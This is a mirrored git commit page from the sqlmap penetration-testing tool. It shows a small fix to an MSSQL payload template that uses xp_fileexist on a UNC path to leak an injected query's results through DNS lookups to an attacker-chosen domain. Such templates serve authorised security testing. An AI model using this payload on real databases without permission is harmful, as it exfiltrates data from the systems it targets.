mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2026-08-04 14:55:40 +00:00
fix for DNS method for MSSQL
This commit is contained in:
parent
2c28423cb8
commit
5f94987b0f
2 changed files with 2 additions and 7 deletions
|
|
@ -1,3 +1,3 @@
|
|||
DECLARE @host varchar(1024);
|
||||
SELECT @host = '%PREFIX%.' + (%QUERY%) + '.%SUFFIX%' + '.%DOMAIN%';
|
||||
EXEC('xp_fileexist "\' + @host + 'c$boot.ini"');
|
||||
EXEC('xp_fileexist "\\' + @host + '\c$boot.ini"');
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue